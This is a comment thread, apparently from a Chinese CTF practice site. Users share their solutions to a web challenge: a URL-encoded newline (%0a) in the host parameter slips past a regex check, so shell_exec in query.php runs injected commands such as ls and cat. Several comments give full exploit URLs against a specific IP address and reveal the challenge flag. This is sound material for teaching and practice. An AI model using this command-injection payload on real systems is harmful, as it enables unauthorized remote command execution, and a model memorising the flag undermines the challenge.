①/query.php?host=whois.verisign-grs.com%0a&query=ls ②/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
为什么%不会被过滤?
查看query源代码发现有个shell_exec()可以rce 通过%0a去截断第一个参数,然后在第二个参数里面输入ls可以查看当前目录文件 然后cat命令读取文件 空格需要url编码
http://82.157.146.43:16777/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
(1)http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=ls (2) http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=cat%20thisistheflagwithrandomstuf
host参数用%0a结尾,正则表达式/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/为什么能匹配成功?host字符串最后一位'\n'明明不在[0-9a-zA-Z\.-]范围内
您弄明白了没有,你这个问题,我没找出答案来,谢谢
query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
/query.php?host=whois.verisign-grs.com%0a&query=ls /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
1.读php文件 2.分析出存在危险函数shell_exec 3.通过url编码换行绕过第一个参数host 4.第二个参数query可以输入rce。空格用url编码绕
...
评论
000ooo 1月前
举报
①/query.php?host=whois.verisign-grs.com%0a&query=ls ②/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
cyffk 1月前
举报
为什么%不会被过滤?
Zhumeng 1月前
举报
查看query源代码发现有个shell_exec()可以rce 通过%0a去截断第一个参数,然后在第二个参数里面输入ls可以查看当前目录文件 然后cat命令读取文件 空格需要url编码
admin9101 3月前
举报
http://82.157.146.43:16777/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
MOCHAOLIN 4月前
举报
(1)http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=ls (2) http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=cat%20thisistheflagwithrandomstuf
wj834722134 5月前
举报
host参数用%0a结尾,正则表达式/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/为什么能匹配成功?host字符串最后一位'\n'明明不在[0-9a-zA-Z\.-]范围内
TOMCAT336699 16天前
举报
您弄明白了没有,你这个问题,我没找出答案来,谢谢
Tao23 7月前
举报
query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
to5ny 8月前
举报
/query.php?host=whois.verisign-grs.com%0a&query=ls /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
xzs297995 9月前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
xiaoxiao972521 9月前
举报
/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
.⎛⎝•̀ω•́⎠⎞. 11月前
举报
1.读php文件 2.分析出存在危险函数shell_exec 3.通过url编码换行绕过第一个参数host 4.第二个参数query可以输入rce。空格用url编码绕